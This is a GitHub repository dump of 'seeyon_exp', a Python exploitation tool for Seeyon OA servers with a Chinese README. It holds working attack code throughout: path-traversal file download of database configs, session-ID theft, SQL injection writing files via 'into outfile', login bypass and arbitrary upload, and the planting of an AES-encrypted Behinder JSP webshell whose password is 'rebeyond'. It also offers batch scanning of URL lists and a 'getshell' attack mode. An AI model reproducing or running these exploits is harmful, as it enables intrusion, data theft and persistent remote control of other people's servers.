-------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/information.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/getSessionList.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/getSessionList.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/session_upload.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/session_upload.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/htmlofficeservlet.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/htmlofficeservlet.cpython-39.pyc -------------------------------------------------------------------------------- /poc/webmail.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | def check(url): 5 | name='webmail.do任意文件下载' 6 | core.start_echo(name) 7 | path='/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties' 8 | r=core.get(url,path) 9 | if r: 10 | if 'workflow' in r.text and r.status_code==200: 11 | core.end_echo(name,'Payload:'+url+path) 12 | core.result(name,url+path) 13 | else: 14 | core.end_echo(name) 15 | else: 16 | core.end_echo(name) 17 | -------------------------------------------------------------------------------- /poc/getSessionList.py: -------------------------------------------------------------------------------- 1 | # -*- 
coding: utf-8 -*- 2 | 3 | from poc import core 4 | import requests 5 | from bs4 import BeautifulSoup 6 | def get_sessionlist(url): 7 | name='getSessionList.jsp session 泄露' 8 | core.start_echo(name) 9 | path='/yyoa/ext/https/getSessionList.jsp?cmd=getAll' 10 | r=core.get(url,path) 11 | if r: 12 | if r.status_code==200 and "" in r.text: 13 | soup=BeautifulSoup(r.text,'lxml') 14 | sessions=soup.find_all('sessionid') 15 | print('\033[32m[#]成功获取到{}个session,第一个为:JSESSIONID={}\033[0m'.format(len(sessions)+1,sessions[0].string.strip('\n\r'))) 16 | core.end_echo(name,'Payload:'+url+path) 17 | core.result(name,url+path,'JSESSIONID='+sessions[0].string.strip('\n\r')) 18 | else: 19 | core.end_echo(name) 20 | else: 21 | core.end_echo(name) 22 | 23 | 24 | -------------------------------------------------------------------------------- /poc/shell.py: -------------------------------------------------------------------------------- 1 | 2 | import zipfile 3 | 4 | shell_name = 'test233.jsp' 5 | shell_name_zip = '../' + shell_name 6 | zip_file_name = "TEST233.zip" 7 | shell_content = r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 8 | 9 | def make_zip_file(): 10 | zf = zipfile.ZipFile(zip_file_name, mode='a', compression=zipfile.ZIP_DEFLATED) 11 | zf.writestr('layout.xml', "") 12 | zf.writestr(shell_name_zip, shell_content) 13 | 14 | make_zip_file() -------------------------------------------------------------------------------- /poc/core.py: 
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

import requests

def result(name,payload,info=None):
    # Append one finding per line to result.txt in the current working
    # directory: `name` is the check label, `payload` the URL that triggered
    # it, `info` optional extra text written after the payload.
    # The file is opened without a `with` block, so the handle is not
    # closed if write() raises.
    f=open('result.txt','a')
    if info:
        f.write(name+': '+payload+' '+info+'\n')
    else:
        f.write(name+': '+payload+'\n')
    f.close()

def start_echo(name):
    # Print the "now checking <name>" banner in blue (ANSI escape codes).
    print('\033[34m[#]check:{}\033[0m'.format(name))

def end_echo(name,payload=None):
    # Close a check on the console: with `payload` the check is reported as
    # present (green, followed by the payload line); without it as absent
    # (blue). Both branches end with a separator rule.
    if payload:
        print('\033[32m[#]存在{}\033[0m'.format(name))
        print('\033[32m[#]{}\033[0m'.format(payload))
        print('\033[34m----------------------------------------------------\033[0m')
    else:
        print('\033[34m[#]不存在{}\033[0m'.format(name))
        print('\033[34m----------------------------------------------------\033[0m')


def post(url,path,header,data,files=None):
    # POST `data` (and `files`, when given) to url+path with a 3 s timeout.
    # verify=False disables TLS certificate validation for every request.
    # Any exception (connection error, timeout, ...) is swallowed and the
    # function falls through to an implicit None return, so callers have to
    # test the result before touching .status_code / .text.
    url=url+path
    try:
        if files:
            r=requests.post(url=url,data=data,headers=header,files=files,timeout=3,verify=False)
            return r
        else:
            r=requests.post(url=url,data=data,headers=header,timeout=3,verify=False)
            return r
    except Exception as e:
        pass

def get(url,path):
    # GET url+path with a 3 s timeout; same verify=False and
    # swallow-and-return-None behaviour as post().
    url=url+path
    try:
        r=requests.get(url=url,timeout=3,verify=False)
        return r
    except Exception as e:
        pass

-------------------------------------------------------------------------------- /seeyon_exp.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

import os
from pyfiglet import Figlet
from optparse import OptionParser
from poc import webmail,session_upload,getSessionList,information,sql,htmlofficeservlet,ajax

if __name__ == '__main__':
    # os.system('@echo off')
    # Windows-only: switch the console code page to 936 (GBK) so the Chinese
    # status messages render; on other hosts the command is simply not found.
    os.system('chcp 936 >nul')
    f=Figlet(font='slant')
    print('\033[31m====================================================\033[0m')
    print('\033[34m{}\033[0m'.format(f.renderText('SeeyonExp')))
    print(' 
\033[33mAuthor:Summer ver:1.0 time:2021-06-02\033[0m') 15 | print('\033[31m====================================================\033[0m'+'\n') 16 | usage="\n"+"python3 %prog -u url"+"\n"+"python3 %prog -u url --att"+"\n"+"python3 %prog -f url.txt"+"\n"+"python3 %prog -f url.txt --att" 17 | parser=OptionParser(usage=usage) 18 | parser.add_option('-u','--url',dest='url',help="target url") 19 | parser.add_option('-f','--file',dest='file',help="url file") 20 | parser.add_option('--att',dest='attack',default=False,action='store_true',help="getshell") 21 | (options,args)=parser.parse_args() 22 | if options.file: 23 | f=open(options.file,'r') 24 | urls=f.readlines() 25 | for url in urls: 26 | url=url.strip('\n') 27 | information.check(url) 28 | getSessionList.get_sessionlist(url) 29 | webmail.check(url) 30 | sql.run(url,options.attack) 31 | session_upload.get_session(url,options.attack) 32 | htmlofficeservlet.check(url,options.attack) 33 | ajax.check(url,options.attack) 34 | print('\033[34m[#]扫描已完成,结果保存至result.txt\033[0m') 35 | 36 | if options.url: 37 | information.check(options.url) 38 | getSessionList.get_sessionlist(options.url) 39 | webmail.check(options.url) 40 | sql.run(options.url,options.attack) 41 | session_upload.get_session(options.url,options.attack) 42 | htmlofficeservlet.check(options.url,options.attack) 43 | ajax.check(options.url,options.attack) 44 | print('\033[34m[#]扫描已完成,结果保存至result.txt\033[0m') 45 | -------------------------------------------------------------------------------- /poc/information.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | 5 | def cerateMysql(url): 6 | name='createMysql.jsp 数据库敏感信息泄' 7 | core.start_echo(name) 8 | path='/yyoa/createMysql.jsp' 9 | path2='/yyoa/ext/createMysql.jsp' 10 | r=core.get(url,path) 11 | if r: 12 | if r.status_code==200 and 'root' in r.text: 13 | core.end_echo(name,'Payload:'+url+path) 14 | 
core.result(name,url+path) 15 | return 16 | r=core.get(url,path2) 17 | if r: 18 | if r.status_code==200 and 'root' in r.text: 19 | core.end_echo(name,'Payload:'+url+path) 20 | core.result(name,url+path) 21 | else: 22 | core.end_echo(name) 23 | else: 24 | core.end_echo(name) 25 | def DownExcelBeanServlet(url): 26 | name='DownExcelBeanServlet 用户敏感信息泄露' 27 | path='/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0' 28 | core.start_echo(name) 29 | r=core.get(url,path) 30 | if r: 31 | if r.status_code==200 and 'xls' in str(r.headers).lower(): 32 | core.end_echo(name,'Payload:'+url+path) 33 | core.result(name,url+path) 34 | else: 35 | core.end_echo(name) 36 | else: 37 | core.end_echo(name) 38 | def initDataAssess(url): 39 | name='initDataAssess.jsp 用户敏感信息泄露' 40 | path='/yyoa/assess/js/initDataAssess.jsp' 41 | core.start_echo(name) 42 | r=core.get(url,path) 43 | if r: 44 | if r.status_code==200 and 'personList' in r.text: 45 | core.end_echo(name,'Payload:'+url+path) 46 | core.result(name,url+path) 47 | else: 48 | core.end_echo(name) 49 | else: 50 | core.end_echo(name) 51 | def status(url): 52 | name='A8 状态监控页面信息泄露' 53 | path='/seeyon/management/status.jsp' 54 | core.start_echo(name) 55 | r=core.get(url,path) 56 | if r: 57 | if r.status_code==200 and 'Password' in r.text: 58 | core.end_echo(name,'Payload:'+url+path) 59 | core.result(name,url+path,'默认密码:WLCCYBD@SEEYON'+' 敏感路径:/seeyon/logs/login.log /seeyon/logs/v3x.log') 60 | else: 61 | core.end_echo(name) 62 | else: 63 | core.end_echo(name) 64 | 65 | def check(url): 66 | status(url) 67 | cerateMysql(url) 68 | DownExcelBeanServlet(url) 69 | initDataAssess(url) 70 | 71 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 
![image.png](https://cdn.nlark.com/yuque/0/2021/png/603531/1622620222886-f40c9762-35e8-4547-9004-ecd3d8e52294.png#align=left&display=inline&height=178&margin=%5Bobject%20Object%5D&name=image.png&originHeight=356&originWidth=907&size=18656&status=done&style=none&width=453.5) 2 | # 工具介绍 3 | **致远OA漏洞检查与利用工具,收录漏洞如下:** 4 | ``` 5 | 信息泄露: 6 | 致远OA A8 状态监控页面信息泄露 7 | 致远OA A6 initDataAssess.jsp 用户敏感信息泄露 8 | 致远OA A6 createMysql.jsp 数据库敏感信息泄露 9 | 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露 10 | 致远OA getSessionList.jsp Session泄漏漏洞 11 | 12 | SQL注入: 13 | 致远OA A6 setextno.jsp SQL注入漏洞 14 | 致远OA A6 test.jsp SQL注入漏洞 15 | 16 | 文件上传: 17 | 致远OA ajax.do 登录绕过&任意文件上传 18 | 致远OA Session泄露 任意文件上传漏洞 19 | 20 | 任意文件下载: 21 | 致远OA webmail.do任意文件下载 22 | ``` 23 | **使用方法:** 24 | ``` 25 | Usage: 26 | python3 seeyon_exp.py -u url #漏洞检测 27 | python3 seeyon_exp.py -u url --att #漏洞检测+getshell 28 | python3 seeyon_exp.py -f url.txt #批量漏洞检查 29 | python3 seeyon_exp.py -f url.txt --att #批量漏洞检测+getshell 30 | 31 | Options: 32 | -h, --help show this help message and exit 33 | -u URL, --url=URL target url 34 | -f FILE, --file=FILE url file 35 | --att getshell 36 | ``` 37 | ``` 38 | python3 seeyon_exp.py -u url 39 | ``` 40 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/603531/1622621523227-5ef552da-4bf2-4a98-ba4c-0c16292dcc8d.png#align=left&display=inline&height=463&margin=%5Bobject%20Object%5D&name=image.png&originHeight=925&originWidth=1219&size=140406&status=done&style=none&width=609.5) 41 | ``` 42 | python3 seeyon_exp.py -u url  --att 43 | ``` 44 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/603531/1622625176126-20a05004-b3e4-4188-acbf-c307f661fff5.png#align=left&display=inline&height=462&margin=%5Bobject%20Object%5D&name=image.png&originHeight=924&originWidth=1218&size=138710&status=done&style=none&width=609) 45 |
47 | **默认使用冰蝎3的webshell,密码为rebeyond** 48 |
50 | **扫描结果保存为result.txt,使用批量扫描时,建议先筛选出存活url**
53 | **仅用于授权测试,违者后果自负** 54 |
56 | 参考链接: 57 | ``` 58 | https://github.com/PeiQi0/PeiQi-WIKI-POC/tree/PeiQi/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA 59 | ``` 60 | 61 | -------------------------------------------------------------------------------- /poc/session_upload.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | import re 5 | import time 6 | from poc import core 7 | 8 | def get_session(url,attack): 9 | name='session泄露&&文件上传getshell' 10 | core.start_echo(name) 11 | path='/seeyon/thirdpartyController.do' 12 | header = { 13 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 14 | "Content-Type": "application/x-www-form-urlencoded", 15 | } 16 | data="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 17 | r=core.post(url,path,header,data) 18 | if r: 19 | if r.status_code==200 and "a8genius.do" in r.text and 'set-cookie' in str(r.headers).lower(): 20 | cookies = requests.utils.dict_from_cookiejar(r.cookies) 21 | cookie = cookies['JSESSIONID'] 22 | if attack: 23 | print('\033[32m[#]成功获取到session:\033[0m'.format(cookie)) 24 | fileUpload(url,cookie,name) 25 | else: 26 | core.end_echo(name,'session:'+cookie) 27 | core.result(name,url+path,'JSESSIONID='+cookie) 28 | else: 29 | core.end_echo(name) 30 | else: 31 | core.end_echo(name) 32 | def fileUpload(url,cookie,name): 33 | path='/seeyon/fileUpload.do?method=processUpload' 34 | print('\033[32m[#]开始上传\033[0m') 35 | files = [('file1', ('test.png', open('poc/TEST233.zip', 'rb'), 'image/png'))] 36 | header={'Cookie':'JSESSIONID=%s'%cookie} 37 | data={'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0','isEncrypt': "0"} 38 | r=core.post(url,path,header,data,files) 39 | if r: 40 | 
firename=re.findall('fileurls=fileurls\+","\+\'(.+)\'',r.text,re.I) 41 | if len(firename)==0: 42 | print('\033[34m[#]上传失败\033[0m') 43 | print('\033[34m---------------------------------------------------\033[0m') 44 | else: 45 | print('\033[32m[#]上传成功\033[0m') 46 | unzip(header,url,firename,cookie,name) 47 | 48 | def unzip(header,url,firename,cookie,name): 49 | path='/seeyon/ajax.do' 50 | nowtime=time.strftime('%Y-%m-%d') 51 | data='method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + nowtime + '%22%2C%22' + firename[0] + '%22%5D' 52 | header['Content-Type']='application/x-www-form-urlencoded' 53 | print('\033[32m[#]开始解压\033[0m') 54 | r=core.post(url,path,header,data) 55 | if r.status_code == 500: 56 | print('\033[32m[#]解压成功\033[0m') 57 | print('\033[32m[#]webshell地址为:{}/seeyon/common/designer/pageLayout/test233.jsp\033[0m'.format(url)) 58 | print('\033[32m[#]冰蝎密码为:rebeyond\033[0m') 59 | print('\033[34m---------------------------------------------------\033[0m') 60 | core.result(name,url+'/seeyon/common/designer/pageLayout/test233.jsp','rebeyond '+'JSESSIONID=%s'%cookie) 61 | else: 62 | print('\033[34m[#]解压失败\033[0m') 63 | print('\033[34m---------------------------------------------------\033[0m') 64 | -------------------------------------------------------------------------------- /poc/htmlofficeservlet.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | import base64 5 | 6 | def check(url,attack): 7 | name='A8 htmlofficeservlet RCE漏洞' 8 | path='/seeyon/htmlofficeservlet' 9 | core.start_echo(name) 10 | r=core.get(url,path) 11 | if r: 12 | if r.status_code==200 and 'htmoffice' in r.text: 13 | if attack: 14 | get_shell(url,path,name) 15 | else: 16 | core.end_echo('可能'+name,url+path) 17 | core.result('可能存在'+name,url+path) 18 | else: 19 | core.end_echo(name) 20 | else: 21 | core.end_echo(name) 22 | 23 | def 
get_shell(url,path,name): 24 | print('\033[32m[#]开始写入webshell\033[0m') 25 | payload="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" 26 | data = base64.b64decode(payload) 27 | header = { 28 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 29 | "Content-Type": "application/x-www-form-urlencoded" 30 | } 31 | r=core.post(url,path,header,data) 32 | if r: 33 | r=core.get(url,'/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+echo+666') 34 | if r: 35 | if '666' in r.text: 36 | print('\033[32m[#]成功写入webshell\033[0m') 37 | core.end_echo(name,'webshell地址:'+url+'/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+echo+666') 38 | core.result(name,url+'/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+echo+666') 39 | else: 40 | print('\033[32m[#]写入webshell失败\033[0m') 41 | core.end_echo(name) 42 | else: 43 | print('\033[32m[#]写入webshell失败\033[0m') 44 | core.end_echo(name) 45 | else: 46 | print('\033[32m[#]写入webshell失败\033[0m') 47 | core.end_echo(name) 48 | -------------------------------------------------------------------------------- /poc/sql.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | import re 5 | import random 6 | def test(url,name,path,attack): 7 | core.start_echo(name) 8 | r=core.get(url,path) 9 | if r: 10 | if r.status_code==200 and '@@basedir' in r.text: 11 | oa_path=re.findall(r'>(.*?)\\OA\\',r.text)[0] 12 | oa_path=oa_path+'/OA/tomcat/webapps/yyoa/' 13 | oa_path=oa_path.replace('\\','/') 14 | if attack: 15 | webshell_name="upload_text{}.jsp".format(random.randint(1,999)) 16 | print('\033[32m[#]成功获得根目录:{}\033[0m'.format(oa_path)) 17 | upload(url,oa_path,webshell_name,name) 18 | else: 19 | core.end_echo(name,'Payload:'+url+path) 20 | core.result(name,url+path) 21 | else: 22 | core.end_echo(name) 23 | else: 24 | core.end_echo(name) 25 | 26 | def upload(url,oa_path,webshell_name,name): 
27 | if name=='A6 test.jsp SQL注入漏洞': 28 | path="/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27{}%27".format(oa_path+webshell_name) 29 | else: 30 | path="/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E')%20%20into%20outfile%20%27{}%27),4".format(oa_path+webshell_name) 31 | print('\033[32m[#]开始上传\033[0m') 32 | r=core.get(url,path) 33 | if 'already' in r.text and r.status_code==200: 34 | print('\033[32m[#]上传失败,存在相同文件,请重试\033[0m') 35 | elif "No Data" in r.text and r.status_code==200: 36 | get_shell(url,webshell_name,name) 37 | else: 38 | print('\033[32m[#]上传失败\033[0m') 39 | core.end_echo(name) 40 | def get_shell(url,webshell_name,name): 41 | webshell="test155{}.jsp".format(random.randint(1,999)) 42 | path='/yyoa/{}?f={}'.format(webshell_name,webshell) 43 | 
data="t=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E" 44 | header={ 45 | "Content-Type": "application/x-www-form-urlencoded" 46 | } 47 | r=core.post(url,path,header,data) 48 | if r: 49 | if r.status_code==200: 50 | webshell_path=url+'/yyoa/'+webshell 51 | print('\033[32m[#]上传成功\033[0m') 52 | print('\033[32m[#]webshell路径:{}\033[0m'.format(webshell_path)) 53 | print('\033[32m[#]冰蝎密码:rebeyond\033[0m') 54 | print('\033[34m----------------------------------------------------\033[0m') 55 | core.result(name,webshell_path,'rebeyond') 56 | else: 57 | print('\033[32m[#]上传失败\033[0m') 58 | core.end_echo(name) 59 | else: 60 | print('\033[32m[#]上传失败\033[0m') 61 | core.end_echo(name) 62 | 63 | def run(url,attack): 64 | name1='A6 test.jsp SQL注入漏洞' 65 | name2='A6 setextno.jsp SQL注入漏洞' 66 | path1='/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)' 67 | path2='/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(SELECT%20@@basedir),4#' 68 | test(url,name1,path1,attack) 69 | test(url,name2,path2,attack) -------------------------------------------------------------------------------- /poc/ajax.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | 5 | def check(url,attack): 6 | name='ajax.do登录绕过&任意文件上传' 7 | 
path='/seeyon/thirdpartyController.do.css/..;/ajax.do' 8 | core.start_echo(name) 9 | r=core.get(url,path) 10 | if r: 11 | if 'java.lang.NullPointerException:null' in r.text: 12 | if attack: 13 | get_shell(name,url) 14 | else: 15 | core.end_echo(name,url+path) 16 | core.result('可能存在'+name,url+path) 17 | else: 18 | core.end_echo(name) 19 | else: 20 | core.end_echo(name) 21 | 22 | def get_shell(name,url): 23 | print('\033[32m[#]开始写入webshell\033[0m') 24 | path='/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip' 25 | header={ 26 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 27 | "Content-Type": "application/x-www-form-urlencoded", 28 | } 29 | data="managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%03uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%C3%94%C2%9E%0Cx%C2%BE%1Fei%C3%95y%C3%B8%09%C3%8C%C3%9C%C2%9D%C3%88%02%0F%C2%A1%C3%9A%C2%8B%C2%9D%C2%98%C3%9E%C3%80%2C%25.7f%C2%A5e%C2%90%C2%BB%C2%A2p%C3%9B%C3%A2Z%C3%86%C2%86%C3%8ERe%C3%81%2C%29%C3%97%5C%1A%40%3C%2F%00%C2%AF%17k%C2%AC%C2%94%C2%AE6%C2%96%C2%8F%C2%83%C2%97%C3%B2%28.b%5B%C2%93%7C%C2%88u%028T%C2%BA%11%1Bn%C2%B4%21%C2%91%C2%A2%C3%A1%C2%B3%13%2B%C3%97-VS%C2%80%C3%B5%08%C2%8A%C2%88%C2%B35%C3%A1j%19%10I%22%C3%8A%C2%818%26%C2%B0%C3%86%
C3%87%0B%C3%8E%C3%92%C2%84%01%7D%C3%8F%C3%96a%C2%925%C2%BC%C3%A9%17%16%C2%BF%12%C3%80R-%3F%C2%95Q%5C%C3%9B%C3%98%14r%28%C2%95%C2%BB%C2%A8%C3%BA%07%C3%B0%2F%C3%9FlQ%C2%8F%5CqA%2CSM%5Dn%C3%B8%28%C2%89Jf%C2%99%C3%8AMZ%1C%7D%C3%9B%0CX%C3%9B%10%C3%8E%C2%80LfT%C3%A7%06%C3%98%C2%AA%C2%B4%0C%15%C2%818%C3%97%C3%A5y%C2%ABw%10%C3%87%01%C3%85+%C2%92%C2%B8I%3D%5E%19%00J%C3%8B%C2%94%C3%9E%C3%B2%C2%83%2B4V%C2%99cl%C3%BC%3DW%05%C2%80%C3%9F%C3%B86%09B%C3%8FT%C2%91%C2%B4%C3%88%C2%A1%15%C2%A2%11%C2%8D%C2%8F%C2%85%C3%A6%C2%AA%C2%90%C2%96%C2%AD%C3%9D%1A%C2%AB%C3%88%C3%86%C2%A8%C2%B0%C2%8F-%C2%B6%2CJ%C3%99fZ%C2%85k%5C%21%17C%C3%96%C2%99%C2%9EG%27%C2%93%7D%C2%A69%C2%AD%C3%B3%7E%C2%B6%C2%8DZo%15%C3%90%1C%C3%90%C3%BC%C3%9D%C3%B3%16%2B%11%C3%80%C3%A8%0A%C3%85%0A%C3%81%C2%99p%C2%80%C3%8BU%C3%AAb%C3%A0%3B76%C2%B4%0F%C3%BB%C2%81%7D%C3%98%C2%90%C2%ADa%23%2B%C3%92%C3%8F%C3%9B%C2%834%C2%B0Bi%048%C3%BD%C3%96%C3%94+%14%C2%AE%C3%90T%0D%C3%8B%C2%A8%06%C2%B6%C3%A6%C2%87P%C2%932%C2%87%C2%9CG%7B%0E%5D%C2%9D6%C3%86%C3%B1%1B%C2%BD%C3%86%10%C3%819%C2%A2uU%03%17%2BH%C2%9E%C2%AE%26%C2%AA%C2%BE%09%C3%A5C%1E%C2%ADi%0C%C2%8E%C2%B9O6aU%C3%98%26%C3%B0%C2%8F%C2%9C%1E%C3%95%C2%B1j%C2%9C.%1C%C3%B9%09%C2%B2%C2%88%C2%9F%7C%C3%B83%C2%B6%7F%C3%BD3%C2%95%C2%89%14%C3%8AZ%23%C2%9F%C3%96%C3%B9%02%C3%84O%C3%97o%C3%B8%C3%9Ay%C3%A4b%C2%9D%C2%A7%C3%B5I%C2%A0%18%C2%A4%C2%804zm%7Dj%C2%BD%C3%86%C2%AF_k%23O%C3%8FT%0E%12%C2%8B%08g%C2%97%C2%B5i%3E%16%C2%99%2C%0A%08%C2%92%C3%89%0D%1A%C3%83%C3%825%C3%90%C2%8D%C2%BEM%C3%B7%C2%BA%C2%B2P%22uN%C3%B3Z%C3%9E%C3%AD%C2%8A%C2%A6%3F8%15%C3%ADc%1D%C3%9B%C2%B4W%C3%A5%C3%A5%0A%01SG%C2%80%C3%9F%176%C2%A7%C2%B3G%C2%AC%C2%BF%C3%BDQ%C2%80%C2%9A%C2%A6s%C3%AB%C3%A2cB%C3%BDLi%0C4%7E%C2%B8rc%C2%85%C2%B5%0C%21%C2%A2%C3%B1Q%3F%C3%B4%0A%1A%C2%8B%0C%C2%90%C2%A0%C3%A9%C3%A9%3D7.%C2%A0%C2%A8%0F%21%C2%AD%C3%ADn%3Anz%12p%0Aq%C3%8C%09%C3%AB%C2%8A%3A%C2%BB%C2%8B%C2%AEe%5B%C3%97U%C3%A9%C3%B2%C3%BB%C3%87%C3%B79g%C2%B2%22%C3%AE%C3%A30%03%C3%BD%C3%89%C2%8B6%C3%BF6%C2%9Cy+%C2%81t%C3%94%C3%A1%C3%BDn%C2%A7%C3%BCs%C2%A5%C3%9
E%7F%C2%A7%C2%BA5%C2%BB3%C2%ADm%C3%8B%C3%B4%C3%AE%C2%80%C3%BD%C3%B6%C2%9E%14%C2%A7%13%05h%C2%96%C3%80%C3%83%C2%97%C3%8E%C3%B1%C2%B0%C3%B8%C3%BA%C3%BCqI%7C%C3%9C4%C3%BD%C2%86Aq%C3%AF%23%C3%B8%C3%BF%C3%A9%02%C2%94d%1Eu%C3%AC%C3%87%C3%B7z%C3%BFP%02z%27%26%C3%8B%C2%9D%3C%04LUU%C2%BD%C2%87%C3%97%C3%AE%0F%C2%BA%1E%C3%A9%C2%8A%7C%C2%AD%C3%AF%C3%BCRx%C3%9D%C2%BF%C3%BF%05%C3%8E%C3%96%C2%AC%C2%8FY%05%00%00" 30 | r=core.post(url,path,header,data) 31 | if r.status_code==500 and '"message":null' in r.text: 32 | print('\033[32m[#]成功写入webshell\033[0m') 33 | core.end_echo(name,'webshell地址:'+url+'/seeyon/test133.jspx'+'\n'+'\033[32m[#]冰蝎密码:rebeyond\033[0m') 34 | core.result(name,url+'/seeyon/test133.jspx','rebeyond') 35 | 36 | else: 37 | print('\033[32m[#]写入webshell失败\033[0m') 38 | core.end_echo(name) 39 | --------------------------------------------------------------------------------